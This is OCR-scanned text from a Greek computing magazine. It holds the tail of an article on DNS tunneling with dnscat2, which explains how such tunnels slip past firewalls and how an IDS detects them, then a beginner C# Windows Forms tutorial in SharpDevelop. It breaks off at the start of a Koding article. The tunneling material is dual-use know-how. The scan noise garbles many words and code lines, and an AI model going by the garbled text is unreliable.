TO firewall, αλλά δεν προσπαθεί να κρύψει την παρουσίατου µε κανέναν τρόπο. Ακρι- 
βώς γι αυτό θα ήταν αδύνατο (ή έστω δύσκολο) να χρησιµοποιηθεί σε µια αληθινή 
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επίθεση, χωρίς να γίνει αµέσως αντιληπτός. Αυτό δεν σηµαίνει ότι πρέπει va ξε- 
χάσουμε την ύπαρξη των DNS tunnels και τους αντίστοιχους κινδύνους. Υπάρχουν 
αρκετά προγράµµατα που χρησιμοποιούν αυτή την τεχνική και δεν αποκλείεται να 
εμφανιστούν κι άλλα. 


Τα DNS tunnels μπορούν να ξεγελάσουν ένα firewall, αλλά όχικαι éva κατάλληλα ρυθ- 
μισμένο Intrusion Detection System. Τα τούνελ αυτού του είδους, βλέπετε, στηρίζο- 
νται σε πολυάριθμα DNS requests, που παρουσιάζουν συγκεκριµένα χαρακτηριστικά 
και είναι σχετικά εὐκολο να εντοπιστούν. [ta va κατανοήσετε καλύτερατι εννοούμε, 
σκεφτείτε το εξής: Ένα σύστηµα µπορεί να στέλνει αιτήµατα σε ένα name server, 
αλλά ο δεύτερος µπορεί µόνο να απαντά. Με άλλα λόγια, ένας name server ὅεν µπο- 
pei να στέλνει αιτήµατα σε ένα απλό μηχάνημα. Παρ’ όλα αυτά, το πρωτόκολλο που 
υλοποιεί το dnscat2 εἶναι αμφίδρομο και o server μοιάζει ικανός va μιλάει µε τον 
client ανά πάσα στιγµή. Αναρωτιέστε πώς επιτυγχάνεται κάτι τέτοιο; Πολύ απλά, το 
πρωτόκολλο του dnscat2 εἶναι του τύπου polling. Αυτό σηµαίνει ότι o client στέλνει 
διαρκώς αιτήµατα στον server, που μεταφέρουν ένα μήνυμα σαν το ακόλουθο: 


"Μήπως θες va µου πεις Κάτι, αγαπητέ server; Αν ναι, απάντα σε αυτό το μήνυμα - 
τώρα που μπορείς!" 


Όπως αντιλαμβάνεστε, το ίδιο κόλπο επιστρατεύουν όλα ra προγράµµατα που επι- 
τυγχάνουν την αμφίδρομη επικοινωνία µέσα από ένα DNS tunnel. H διαρκής απο- 
στολή των αιτημάτων, όµως, παρουσιάζει µια κάποια συχνότητα (ενδεχομένως και 
κανονικότητα) που εἰναι εύκολα ανιχνεύσιμη. Ένα άλλο γνώριμα των αιτημάτων 
DNS που δημιουργούν αυτά τα προγράμματα, εἶναι το ασυνήθιστα µεγάλο hostname. 
Πολύ συχνά, εμφανίζονται να αναζητούν μηχανήματα που έχουν παραπάνω από εκα- 
τό χαρακτήρες στο ὀνομάτους. 


Είμαστε σίγουροι ότι av το ψάξετε και μόνοι σας, θα βρείτε αρκετές μεθόδους για 
τον εντοπισμό και το μπλοκάρισμα των DNS tunnel. Πάντως, ανεξάρτητα από το αν 
θα εμβαθύνετε περισσότερο ñ όχι, η τεχνική που παρουσιάσαµε είναι έξυπνη, απλή 
και όμορφη! Μπορεί να µην την αξιοποιήσουµε ποτέ, αλλά η σκέψη µας θα έχει προ- 
χωρήσει. 


Σηµείωση: Το VPS που έτρεχε τον dnscat2 server για τις ανάγκες αυτού TOU 
ἄρθρου ήταν éva μικρό droplet tnc Digital Ocean. Μπορείτε να φτιάξετε κι εσείς 
το δικό σας ξεκινώντας από αυτό το referral URL: http://bit.ly/digocean10off. 
Κερδίζετε ότσι αυτομάτως 10$ σε credit, γεγονός που σημαίνει ότι το μικρό 
droplet παραμένει δωρεάν για δύο μήνες. 
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Skill: Intermediate 
Tags: .NET, C#, programming, desktop, Windows 


Ανάπτυξη εφαρμογών 
σε C# yuq To .NET 


[μέρος Το] 


Φτάσαμε αισίως στο 7? µέρος της σειράς και o' αυτό το άρθρο θα ασχοληθούμε 
με το περιβάλλον των Windows 7. H συγκεκριμένη έκδοση θεωρείται από 
πολλούς ως ηπιο στιβαρή του δημοφιλούς λειτουργικού. Στο παρόν άρθρο 
εκπληρώνουμε την αρχική µας υπόσχεση και περνάμε, επιτέλους, στο χώρο των 
παραθυρικών εφαρμογών. 


του Πέτρου Κυλαδίτη 


Όταν ξεκινήσαμε αυτή τη σειρά άρθρων στόχος µας ήταν η εκμάθηση της C# µε 
απώτερο σκοπό την εύκολη δημιουργία παραθυρικών εφαρμογών. Μπορεί τα ζητή- 
ματα που έχουμε μελετήσει ως τώρα va υποδήλωναν µια σιωπηρή αλλαγή ρότας, 
αλλά εμείς δεν είµαστε από εκείνους που αθετούν τις υποσχέσεις τους. H κατα- 
σκευή ενός “παραθυρικού” προγράµµατος αποτελεί εύκολη υπόθεση. Ωστόσο, η 
ικανότητα να εκμεταλλευτούμε στο έπακρο αυτή την ευκολία, καθώς κι όλα όσα 
προσφέρει η CZ, δεν εἰναι δεδομένη. Όσα εἰδαμε ως τώρα, αποτελούσαν τα πρώτα 
βήματα ενός σχεδίου για va προλειάνουµε το έδαφος και να δημιουργήσουμε όσο TO 
δυνατόν πιο γερά γνωστικά θεμέλια. 


Έφτασε λοιπόν η στιγµή της μετάβασης από την κονσόλα στο παραθυρικό περιβάλ- 
λον. Στο μονοπάτι που ξεδιπλώνεται µπροστά µας θα έχουµε σύμμαχο και φίλο TO 
ελαφρύ IDE SharpDevelop, που είναι και προϊόν Ανοιχτού Κώδικα. Αυτό δεν αποτελεί 
πρόβληµαγιατους φίλους που θα ήθελαν να εξοικειωθούν ue ra θηριώδη MS Visual 
Studio και Xamarin Studio. Οι διαφορές που παρουσιάζουν τα διάφορα ΙΡΕ στον τρό- 
πο ανάπτυξης είναι αμυδρές. 


Hello World, à la Desktop! 


Αφού ανοίξουμε το αγαπημένο µας IDE, μεταβαίνουμε στο κεντρικό μενού κι 
ακολουθούμε τη διαδρομή File > New > Solution. Στο γνωστό παράθυρο που εμ- 
φανίζεται για την επιλογή του τύπου του Project, κάνουμε κλικ στο πολυπόθητο 
Windows Application. Δίνουμε éva χαρακτηριστικό όνομα (εμείς επιλέξαμε το 
HelloDesktopWorld) και πατάµε το κουμπί Create. Έτσι επιστρέφουµε στο περιβάλ- 
λον εργασίας rou IDE, όπου έχουν δημιουργηθεί πλέον τα βασικά τμήματα της εφαρ- 
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μογής. Στη δενδροειδή προβολή των στοιχείων rou Project, εκτός από το συνηθι- 
σµένο αρχείο Program.cs, θα βρούμε δύο ακόµα: το MainForm.cs και ro MainForm. 
Designer.cs, που φαίνεται να βρίσκεται ιεραρχικά “κάτω” από το προηγούμενο. 


Αν ανοίξουμε το Program.cs δεν θα βρούμε τον κώδικα που συναντούσαμε ως τώρα. 
Στην περίπτωση µιας παραθυρικής εφαρμογής, βλέπετε, το Program.cs εἶναι υπεύ- 
θυνο για την προβολή του κεντρικού παράθυρου. Η λειτουργικότητα και η µορφή 
αυτού του παραθύρου -της λεγόμενης κύριας φόρμας--, καθορίζονται στα άλλα 
αρχεία. Το MainForm.cs περιέχει τον κώδικα που εκτελείται όταν ο χρήστης αλ- 
ληλεπιδρά µε τη φόρμα (T.X, όταν πατάει κάποιο κουμπί). Το MainForm.Designer.cs 
περιγράφει ra στοιχεία που απαρτίζουν τη φόρμα (κουμπιά, μενού, πλαίσια κειμένου 
κ.λπ.) τη θέση τους, το μέγεθος, το χρώμα κ.ά. 


Σχεδίαση µε αντικείµενα 


Σε αντίθεση µε το μυστήριο που κάλυπτε τη σχεδίαση των παραθύρων στη Visual 
Basic, στο «ΝΕΤ τα πράγματα είναι ξεκάθαρα. Τα διάφορα στοιχεία rou περιβάλ- 
λοντος σχηματίζονται µε τη βοήθεια των αντίστοιχων αντικειμένων, που βρίσκο- 
νται στο χώρο ονομάτων System.Windows.Forms. Εν ολίγοις, τα συγκεκριµένα 
αντικείµενα θυμίζουν τα wxWidgets που είχε παρουσιάσει ο εκλεκτός φίλος και 
συνάδελφος Sonic, ora άρθρα rou για την Python. Μήπως σας δυσαρεστεί η ιδέα 
του να σχηματίσετε το περιβάλλον µιας εφαρµογής, αρχικοποιώντας χειροκίνη- 
τα τα απαιτούμενα αντικείµενα; Δεν υπάρχει λόγος να χαλάτε τη διάθεσή σας! To 
βαρετό κομμάτι του κώδικα, που περιγράφει τα διάφορα στοιχεία του παραθύ- 
ρου, συντάσσεται αυτόματα απὀ το εργαλείο σχεδίασης του SharpDevelop. Ελά- 
χιστες φορές θα χρειαστεί va επέµβουµε σε αυτό το τµήµα του κώδικα και Kar 
επέκταση στο αρχείο MainForm.Designer.cs. 


Εδώ θα ήταν χρήσιμο να αναφέρουμε ότι η ανάπτυξη των παραθυρικών εφαρμογών 
ακολουθεί τη λογική του event driven programming, όπως ονομάζεται στα Λεπτό- 
ποδα της Χίου. Τα προγράµµατα αυτού του είδους περιμένουν να προκύψει κάποιο 
“συμβάν” και τότε εκτελούν την αντίστοιχη ενέργεια. Τα συμβάντα προκύπτουν ως 
αποτέλεσµα των ενεργειών του χρήστη (π.χ. το πάτηµα ενός κουμπιού), αλλά UTO- 
ρούν να προκύψουν και σε άλλες περιπτώσεις (π.χ. όταν ολοκληρώνεται µια εργα- 
oia nou εξελισσόταν στο υπόβαθρο). Θα μπορούσαμεναπεριγράψουµε τα συμβάντα 
σαν éva εἶδος interrupt, που υλοποιούνται αποκλειστικά σε επίπεδο software. H θε- 
ωρία όµως είναι ατελείωτη κι ορισμένες φορές λειτουργεί ως κινούμενη ἄμμος: 
αν δεν προσέξεις, σε απορροφά. H πρώτη µας παραθυρική εφαρµογή αποτελεί ένα 
κλασικό "Hello World". Ας αναλάβουμµε δράση. 


Κατασκευή της φόρμας 


Ανοίγοντας το αρχείο MainForm.cs, στο κάτω µέρος rou editor, παρατηρούμε ότι 
εμφανίζονται πλέον δύο καρτέλες. H προεπιλεγµένη καρτέλα ονομάζεται Source 
και, όπως δηλώνει το ὀνομάτης, περιέχει τον κώδικα γιατις διάφορες λειτουργίες 
TOU προγράμματός µας. H άλλη καρτέλα ονομάζεται Design και περιλαμβάνει ένα 
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A project that creates an application with a Windows interface. 


Location: CAUser User Desktop [η 
Solution Name: Part7 I Create directory for solution 


Project will be created at C Users Users Desktop VPart 7\Hello Desktop Word 


H δηµιουργία µιας παραθυρικής εφαρµογής anó ro περιβάλλον 
του SharpDevelop είναι πολύ απλή. Αρκεί να επιλέξουμε To 
σχετικό είδος για το νέο Solution. 


περιβάλλον σχεδίασης. Μόλις μεταβούμε στη δεύτερη καρτέλα, θα εμφανιστεί µια 
µικρή κενή φόρμα που έχει δημιουργηθεί αυτόματα από ro IDE. Πα va τροποποιή- 
σουµε το μέγεθος της φόρμας μπορούμε να χρησιμοποιήσουμε το ποντίκι και να 
“τραβήξουμε” τη δεξιά ή την κάτω πλευρά της. Αυτός ο τρόπος είναι εύκολος και 
γρήγορος, αλλά δεν προσφέρει ακρίβεια. Αν θέλουµε να επιβάλλουµε συγκεκρι- 
μένες διαστάσεις, πρέπει να καταφύγουμε στο πλαίσιο ιδιοτήτων που βρίσκεται 
στην καρτέλα Properties, στο δεξί τµήµα του παραθύρου του SharpDevelop. Εκεί θα 
βρούμε μιαπληθώρα ιδιοτήτων που μπορούμε va ττροποποιήσουµε ελεύθερα.Πανα 
καθορίσουμε το μέγεθος της φόρμας µε ακρίβεια, αρκεί va επέµβουµε στις τιµές 
των ιδιοτήτων Width και Height, που βρίσκονται στην ομάδα Size. Σε αυτό το ση- 
usio θα μπορούσαμε να περιγράψουμε τις αμέτρητες ιδιότητες που µπορεί κανείς 
να πειράξει, αλλά έτσι θα σας στερούσαμε τη χαρά να τις ανακαλύψετε μόνοι σας. 
Αυτό που προτείνουμε, λοιπόν, εἶναι va πειραµατιστείτε άφοβα µε όλες. Έχετε υπό- 
yn órt καθώς η φόρμα δεν περιλαμβάνει άλλα στοιχεία -τουλάχιστον γιατην ώρα--, 
οι ιδιότητες αφορούν στην ἰδια τη φόρμα και μόνο. 
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Το επόμενο βήμα εἰναι να εισάγουµε τα αντικείµενα που θέλουμε να περιλαμβάνει 
η φόρμα. fia τις ανάγκες της εφαρμογής µας -τουλάχιστον έτσι όπως την έχουμε 
φανταστεί- 8a χρειαστούμε ένα κουμπάκι. Πα va προσθέσουμε οποιοδήποτε αντι- 
κείμενο, επιλέγουμε την καρτέλα Tools που φαίνεται στο κάτω αριστερό άκρο του 
παραθύρου του SharpDevelop. H εν λόγω καρτέλα περιλαμβάνει µια λίστα µε τα 
διάφορα εἰδη αντικειμένων. Τα κουμπιά βρίσκονται στην ομάδα "Windows Forms". 
Μόλις κάνουμε κλικ στο όνοµα της συγκεκριμένης ομάδας εμφανίζονται όλα τα 
στοιχεία γραφικών που μπορούμε va εισαγάγουµε σε µια φόρμα φόρμα. Επιλέγουμε 
το Button και στη συνέχει κάνουμε κλικ κάπου μέσα στη φόρμα. Με αυτόν τον τρόπο 
θα δημιουργηθεί ένα κουμπί στο σηµείο όπου κάναμε κλικ. Κατά τα γνωστά, UTO- 
ρούμε να μεταβάλλουμε τις διαστάσεις του κουμπιού µε το ποντίκι. Κάνοντας éva 
κλικ στο κουμπί, θα παρατηρήσετε ότι η περιοχή στα δεξιά του SharpDevelop €p- 
φανίζει éva νέο σετ ιδιοτήτων, οι οποίες αφορούν αποκλειστικά στο συγκεκριµένο 
αντικείµενο. Εδώ µπορείτε και πάλι ναπειραματιστείτε ελεύθερα. Εμείς αλλάξαμε 
το κείµενο που εµφανίζεται πάνω στο κουμπί σε “Say Hello”, τροποποιώντας την 
ιδιότητα Text. Επιπρόσθετα, αλλάξαμε TO ὀνοματου αντικειμένου του κουμπιού από 
Button] σε κάτι ruo περιγραφικό, όπως ro ButtonSayHello. Αυτό γίνεται τροποποιώ- 
ντας κατάλληλα την ιδιότητα Name. Παρεμπιπτόντως, η αλλαγή του ονόματος των 
διαφόρων αντικειμένων αποτελεί µια πολύ καλή πρακτική, που θα ήταν φρόνιμο 
να εντάξετε στον τρόπο εργασίας σας. H χρήση των προεπιλεγµένων ονομάτων, 
ειδικά σε µια εφαρμογή που περιλαμβάνει αρκετά αντικείμενα της ἰδιας κλάσης, 
προκαλεί μπερδέματα καιτελικά καθιστά τον κὠδικα δυσανάγνωστο. Mta πρακτική 
γιατην επιλογή ονομάτων, είναι να χρησιμοποιούμε ως πρόθεμα μιαλέξηπουναπε- 
ριγράφει το είδος του αντικειμένου (π.χ., ButtonSayHello, TextBoxUserName κ.ο.κ.) 


Αφού ολοκληρώσουμε το στήσιμο της φόρμας, μπορούμε να προχωρήσουμε 
στον κώδικα. Στο πρόγραμμά µας θέλουμε να εμφανίζει éva παράθυρο μηνύματος 
(MessageBox) µε τον κλασικό χαιρετισμό "Hello World", κάθε φορά που ο χρήστης 
πατάει στο κουμπί "Say Hello”. Σε αυτό το σημείο θα μπορούσαμε να μεταβούμε στην 
καρτέλα Source, να ανοίξουμε το αρχείο MainForm.Designer.cs και να ορίσουμε µια 
μέθοδο που θα εκτελείται όταν γίνεται κλικ επάνω στο κουμπί. Προφανώς, στη συ- 
νέχεια θα έπρεπε να γράψουμε τον κώδικα της μεθόδου. To SharpDevelop, όμως, 
προσφέρει µια ευκολία που συντομεύει αυτή τη διαδικασία. Αρκεί να κάνουμε δύο 
κλικ επάνω στο κουμπί µας. To IDE θα δημιουργήσει αυτόματα την απαιτούμενη pé- 
θοδο, θα την προσθέσει στο MainForm.Designer.cs και θα µας μεταφέρει στην καρ- 
τέλα Source, για να εισάγουµε τον κώδικα της μεθόδου. Εμείς κάναμε τα παραπάνω 
και πληκτρολογήσαμε την ακόλουθη γραμμή: 


MessageBox.Show("Hello from the Desktop World!", "A Message for you", 
MessageBoxButtons.OK, MessageBoxIcon.Information) ; 


Όπως βλέπετε, o κωὠδικας καλεί τη στατική μέθοδο Show του αντικειμένου 
MessageBox, που είναι υπεύθυνο γιατην εμφάνιση των ομώνυμων παραθύρων των 
Windows. Εκτός από την εμφάνιση του μηνύματος, n ἰδια μέθοδος έχει τη δυνατότη- 
τα να επιστρέψει éva αντικείµενο τύπου DialogResult µε την απόκριση του χρήστη 
(το κουμπί που πάτησε). Στην περίπτωση του δικού µας προγράµµατος, όμως, δεν 
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File Edit View Project Build Debug Search Analysis Format Tool: Window Help 


ü spa G | x €) Qi EP 8 Bl|peakiyot τσ 5 = G asp elo - 
| / MainForm.cs |^ Program.cs |^ MainForm.Designercs | 

Windows Forms 
k. Pointer ^ 
(ab) Button —————— 

RightToLeft No ^ 
Check RightToLeft False 
E ComboBox Tet HelloDesktop 
A Label UseWaitCui False 
© RadioButton a an - 

uses Valic True 
(abl TextBox B  l'ipóoBaon 
EZ CheckedListBox D L Accessible 
TA DateTimePicker Accessible! 
| Š DomainUpDown AccessibleF Default 
E] Στυλ παραθύρου 
s 
BE Foal ayoitPand ControlBox True 
[7] GroupBox HelpButton False 
&i3 HScrollBar Hl Icon Εικονίδιο) 
A LinkLabel IsMdiContai False 
istB MainMenuS (κανένα) 
E x MaximizeBo True 
[orc ες MinimizeBo» True v 
Components | Tet 
Printi Το κείµενο που σχετίζεται µε 
σα = = ||| ro στοιχείο ελέγχου. 
Usi Componer 1 

E Projects |] Tools Source Design [5 Properties [38 Classes | 
[19 Errors [E] Output | Š] Task List |Œ] Definition View [|Ë] Search Result | 
Ready In 38 coliü ch4 INS 


To περιβάλλον σχεδίασης rou SharpDevelop. Στο κέντρο βρίσκεται Το 
παράθυρο της υπερδιαστηµικής εφαρµογής που αναπτύσσουμε. Στα δεξιά 
εμφανίζονται οι ιδιότητες του εκάστοτε επιλεγμένου αντικειμένου, ενώ 
στα αριστερά βλέπουμε µια εργαλειοθήκη µε όλα τα διαθέσιµα controls 
(προς θεού, όχι capital) που μπορούμε va εισάγουµε στη φόρμα. 


μας ενδιαφέρει να χειριστούμε κάπως την απόκριση του χρήστη. Ακριβώς γι αυτό, 
αδιαφορούμε για το αντικείµενο που επιστρέφει η μέθοδος Show και δεν ro αποθη- 
κεύουµε σε κάποια μεταβλητή. 


H πρώτη παράμετρος που δώσαμε στη μέθοδο Show αποτελεί το κείµενο που θέ- 
λουµε να εµφανίζεται, ενώ η δεύτερη παράμετρος καθορίζει τον TLTÀO TOU σχετικού 
παραθύρου. Σημειώστε ότι η δεύτερη παράμετρος, όπως και όλες όσες ακολου- 
θούν, δεν είναι υποχρεωτική. H τρίτη παράμετρος ορίζει τα κουμπιά που περιλαμ- 
βάνει το MessageBox. Πα τα κουμπιά μπορούμε να χρησιμοποιήσουμε τα µέλη της 
απαρίθµησης (enumeration) ονόματι MessageBoxButtons. Τέλος, για τον καθορισμό 
του εικονιδίου που θα έχει το MessageBox, χρησιμοποιούμε τα µέλη της απαρίθµη- 
σης MessageBoxlcon. 


Μετά τη συγγραφή του σπουδαίου µας κὠδικα, μπορούμε να αποθηκεύσουµε το 
project και να προχωρήσουμε σε µια δοκιμαστική εκτέλεση του προγράµµατος. Πι- 
στεύουµε ότι αν και πρόκειται για κάτι εξαιρετικά απλό, θα το χαρείτε. 


Παιχνίδι νεύρων 


Τιθαλέγατε αν καθιστούσαµε το πρόγραμμά µας λίγο εκνευριστικό; Κάθε φορά που 
ο χρήστης θα προσπαθεί να κλείσει την εφαρµογή, πατώντας στο κόκκινο κουμπί 
ug ro X, θα εµφανίζεται ένα παράθυρο που θα rov ρωτάει αν όντως επιθυμεί τον 
τερματισμό. Εδώ που τα λέμε, αυτή η λειτουργία ενσωματώνεται σε αρκετά προ- 
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a HelloDesktopWorld - P 


Όνομα χρήστη deltaHacker 


(2) Θέλετε σίγουρα να τερματίσετε τη λειτουργία αυτής της υπέροχης 


εφαρµογής; 


Μα γιατί κάποιος που επέλεξε τον τερματισμό της εφαρµογής, 
γα επιθυμεί πραγματικά κάτι τέτοιο; Ας TOV ρωτήσουμε, µην 
τυχόν και φύγει κατά λάθος από την υπέροχη εφαρμογή μας. 


γράμματα και πολύ συχνά αποδεικνύεται σωτήρια, για τα τυχόν δεδομένα που δεν 
έχουμε αποθηκεύσει. Βέβαια, στην περίπτωση του δικού µας προγράµµατος, αυτή n 
ερώτηση θα εἶναι απλά εκνευριστική - τελεία. 


Ωραία, μόλις αποφασίσαμε va δοκιµάσουµε τα νεύρα των χρηστών. Πού θα γράψου- 
µε τον κώδικα, όμως; Με διπλό κλικ επάνω στη φόρμα, από το εργαλείο σχεδίασης 
του SharpDevelop, δημιουργείται µια μέθοδος χειρισμού για το συμβάν rou φορτώ- 
ματος της φόρμας. Προφανώς, πρόκειται για κάτι άσχετο µε αυτό που ψάχνουμε. 
Μήπως σκεφτόσαστε ότι αυτή τη φορά θα ορίσουμε μόνοι µας την απαιτούμενη pé- 
θοδο; Ελπίζουμε πως ὀχι, γιατί το SharpDevelop θα σας διαψεύσει αµέσως. Καθώς 
βρισκόμαστε στην καρτέλα Design, πάνω απὀ το πλαίσιο µε τις ιδιότητες εμφανίζε- 
ται ÉVA κουμπάκι µε έναν κεραυνό. Αυτό το κουμπάκι προβάλλει όλα ra συμβάντα 
που υποστηρίζει το επιλεγμένο στοιχείο. Μάλιστα, δίπλα σε κάθε συμβάν εμφανί- 
ζεται και η αντίστοιχη μέθοδος χειρισμού, εφόσον έχει οριστεί. Με διπλό κλικ σε 
κάποιο συμβάν, για το οποίο δεν έχει οριστεί μέθοδος χειρισμού, ro SharpDevelop 
ορίζει µια μέθοδο αυτόματα. Επιστρέφοντας στο θέµα µας πρέπει να επιλέξουμε 
τη φόρμα µε ένα κλικ, να πατήσουµε το κουμπί µε τον κεραυνό και να εντοπίσουµε 
το συμβάν FormClosing. Προφανώς, το συγκεκριµένο συμβάν πυροδοτείται κατά το 
κλείσιμο της φόρμας. Κάνοντας διπλό κλικ επάνω στο όνομα του συμβάντος, δημι- 
ουργείται αυτόματα µια μέθοδος και µεταφερόμαστε στην καρτέλα Source, για να 
εισάγουµε τον κὠδικά της. Εμείς πληκτρολογήσαμετις ακόλουθες γραμμές: 
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DialogResult result = MessageBox.Show("O£Aete σίγουρα va τερµατίσετε τη 
λειτουργία αυτής της υπέροχης εφαρμογής;", "Πού πας;", MessageBoxButtons.YesNo, 
MessageBoxIcon.Question, MessageBoxDefaultButton.Button2) ; 


if(result == DialogResult.No)[ 
e.Cancel - true ; 


} 


Όπως βλέπετε χρησιμοποιούμε και πάλι éva MessageBox. Αυτή τη φορά, όµως, θέ- 
λουµε να τσεκάρουµε την απόκριση του χρήστη και yc αυτό αποθηκεύουµε το αντι- 
κείµενο που επιστρέφει η μέθοδος Show(), στη μεταβλητή result. Παρατηρείστε ότι 
από την απαρίθµηση MessageBoxButtons έχουµε επιλέξει το µέλος ονόματι YesNo. 
Αυτό το µέλος αντιστοιχεί σε δύο κουμπιά µε τα σχετικά ονόματα (ένα Yes κι ένα 
Νο). Επιπρόσθετα, µετά τον καθορισμό του επιθυμητού εικονιδίου, δηλώσαμε και 
την προεπιλεγµένη απάντηση. Αυτό επιτυγχάνεται µε την τελευταία παράμετρο, 
όπου χρησιµοποιήσαµε την απαρίθμηση MessageBoxDefaultButton. Όπως βλέπετε 
επιλέξαμε ως προεπιλεγµένη απάντηση το δεύτερο κουμπί, που αντιστοιχεί στο 
Νο. O χρήστης θα πρέπει va ro ξανασκεφτεί πριν κλείσει την εφαρµογή µας. 


Στις επόμενες γραμμές ελέγχουμε την τιμή του αντικειμένου DialogResult, που ap- 
βάνουμε από τη μέθοδο Show(). Av ο χρήστης έχει πατήσει το No (κι επειδή εμείς 
δεν είµαστε σαν ορισμένους πολιτικούς) θα σεβαστούμε την απόφασή του και TO 
πρόγραμμα δεν θα τερματιστεί. Αυτό επιτυγχάνεται τροποποιώντας κατάλληλα 
την ιδιότητα του συμβάντος (event) που ονομάζεται Cancel. 


Προσωπικός χαιρετισμός 


Πα va καλοπιάσουµε τους χρήστες της εφαρµογής -Kat πριν τους ωθήσουμε στην 
αγανάκτηση- αποφασίσαμε να µεταβάλλουμε το περιεχόµενο TOU χαιρετισμού. 
Σκεφτήκαμε ÓTL TO μήνυμα θαγινόταν πιο φιλικό, αν περιλάμβανε το όνοµα του χρή- 
στη. [ia va πετύχουμε κάτι τέτοιο, χρειαζόμαστε δύο πρόσθετα στοιχεία: Ένα Label 
κι ένα TextBox. Όπως υποψιάζεστε, τα εν λόγω αντικείμενα εμφανίζονται στην TE- 
ριοχή tools και στην ίδια ομάδα µε τα κουμπιά (Windows Forms). Αφού προσθέσουμε 
τα δύο αντικείμενα και τα µετακινήσουμε στις επιθυμητές θέσεις, προχωράμε σε 
μια µικρή τροποποίηση των ονομάτων τους. Έτσι, αποδίδουµε στο αντικείµενο Label 
το όνομα LabelUsername και στο αντικείμενο TextBox το όνομα TextBoxUsername. 
Επιπρόσθετα, yta va βοηθήσουμε το χρήστη να καταλάβει τι πρέπει να κάνει, αλλά- 
ζουμε την ιδιότητα Text του αντικειμένου Label σε "Όνομα χρήστη". Μετά από αυτή 
την επέμβαση, πρέπει va τροποποιήσουµε τον κὠδικατου προγράμματός µας WOTE 
να αξιοποιεί τη συμβολοσειρά που έχει εισάγει ο χρήστης στο TextBox. Ανοίγουμε 
λοιπόν την καρτέλα Source, μεταβαίνουμε στη μέθοδο ButtonSayHelloClick κι αφού 
διαγράψουµε τον κὠδικαπου είχαμε γράψει νωρίτερα, εισάγουµε τα εξής: 


string name = textBoxUsername.Text ; 
DateTime now = DateTime.Now ; 
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string greeting ; 

if(now.Hour > 5 && now.Hour < 12)4 
greeting = "καλημέρα" ; 

}else if(now.Hour >= 12 && now.Hour <= 20)4 
greeting = "καλησπέρα" ; 

}else{ 
greeting = "καλό βράδυ" ; 


} 

MessageBox .Show("Ayannté " + name + ",\n" + greeting + ^" από το περιβάλλον 
των παραθύρων!", "Ένα μήνυμα για 'oéva", MessageBoxButtons.OK, MessageBoxIcon. 
Information) ; 


Στην πρώτη γραμμή λαμβάνουμε τη συμβολοσειρά που έδωσε ο χρήστης, από την 
ιδιότητα Text του αντικειμένου TextBoxUsername. Στη συνέχεια χρησιμοποιούμε 
την ιδιότητα Now του αντικειμένου DateTime (DateTime.Now), για να πάρουμε την 
τρέχουσα ημερομηνία και copa. Το αποτέλεσµα αποθηκεύεται σε ένα ομοειδές αντι- 
κείµενο (DateTime) µε το όνοµα now (προσοχή στη διάκριση πεζών και κεφαλαίων). 
Στις επόμενες γραμμές αξιοποιούµε την τιµή του αντικειμένου now και συγκεκρι- 
μένα την ιδιότητα Hour. Έτσι, επιλέγουμε τον χαιρετισμό που αρμόζει στην τρέχου- 
σα ώρα και τον αποθηκεύουµε στη συμβολοσειρά string. Στο τέλος, αξιοποιούµε 
τα δεδοµένα που έχουµε συλλέξει (όνοµα χρήστη και χαιρετισμός) προκειµένου va 
δημιουργήσουμε ένα MessageBox µε ro véo μήνυμα. 


Ζήτημα οργάνωσης 


Όλος ο κώδικας που εξετάσαµε βρισκόταν µέσα στις μεθόδους που χειρίζονται 
τα διάφορα συμβάντα. Αυτό μοιάζει απολύτως λογικό κι αναμενόμενο, αλλά 
πρέπει να τονίσουμε ότι δεν αποτελεί καλή τακτική. Για την ακρίβεια, αποτε- 
Asi συνταγή για προβλήματα. Σε επόμενα άρθρα της σειράς θα δούμε ότι είναι 
προτιμότερο να τοποθετούμε τον κώδικα σε ξεχωριστές μεθόδους, οι οποίες 
θα καλούνται από τις μεθόδους χειρισμού των συμβάντων. Με µια τέτοια διάρ- 
θρωση του κώδικα μπορούμε να ανακυκλώνουµμε ορισμένα τμήματά του, αξιο- 
ποιώντας τα σε πολλές μεθόδους χειρισμού διαφορετικών συμβάντων. Έτσι O 
κώδικας είναι μικρότερος και πιο συμμαζεμένος, ενώ κάθε επιµέρους λειτουρ- 
yia υλοποιείται μόνο µια φορά. Το γεγονός αυτό διευκολύνει τον εντοπισμό των 
πιθανών προβλημάτων, όπως επίσης και µια ενδεχόμενη αναβάθμιση. Μήπως 
αναρωτιέστε τώραγιατί επιλέξαμε να οργανώσουμε το δικό µας κὠδικα διαφο- 
ρετικά; Σ’ éva τόσο μικρό πρόγραμμασαν αυτό που παρουσιάσαµε, η τοποθέτηση 
του κωὠδικα σε ξεχωριστές μεθόδους δεν θα προσέφερε κανένα όφελος ενώ 
ενδέχεται να δυσκόλευε και την παρουσίαση. 
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aJ HelloDesktopWorld - Π 


Όνομα χρήστη — detaHacker | 


Say Hello! 


Αγαπητέ deltaHacker, 
καλησπέρα απὀ το περιβάλλον των παραθύρων! 


H εξελιγμένη µορφή της εφαρµογής µας μοιράζει 
προσωποποιηµένες και χρονικά αρµόζουσες χαιρετούρες :Ρ 


Μια (ακόµα) υπόσχεση 


Το πρώτο µας 'παραθυρικό” πρόγραµµα δεν αποτελεί και την πιο χρήσιμη εφαρµο- 
γή. Να είστε σίγουροι, όµως, ότι η συνέχεια θα σας ανταμείψει. Ανανεώνουμε το 
ραντεβού µας για το επόμενο τεύχος και, όπως πάντα, σας προτρέπουµε να TEL- 
ραματιστείτε µε τον κὠδικά µας ελεύθερα. Μπορείτε va rov κατεβάσετε απὀ τη 
διεύθυνση http://bit.ly/dh045_dnet_p7, av και εἰμαστε σίγουροι ότι σύντομα θα γρά- 
φετε μόνοι σας πολύ πιο σύνθετα προγράµµατα. Καλή διασκέδαση και, για να µην 
ξεχνιόμαστε, καλά μπάνια. 
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AV E mp oar TUNI | Ar ΙΑ σης 
JAN EY VA. i OAA Md i WR ὑ 
μα. ; 2g NU AU ^A MIROR 


Skill: Beginner 
Tags: web development, cloud, virtual machine, collaboration 


Ανάπτυξη στο 
Σύννεφο µε το Koding 


Ξεχάστε τον παραδοσιακό τρόπο ανάπτυξης ιστοσελίδων και web applications. 
Για την ακρίβεια, ξεχάστε τους μπελάδες που κρύβει το σετάρισµα ενός web 
server και, γενικότερα, του περιβάλλοντος στο οποίο θα εργαστούμε. To Koding 
λύνει όλα ra παραπάνω προβλήµατα και μάλιστα δωρεάν. Επιπρόσθετα, παρέχει 
ένα σύγχρονο περιβάλλον εργασίας, που επιτρέπει ακόµα και τη συνεργασία µε 
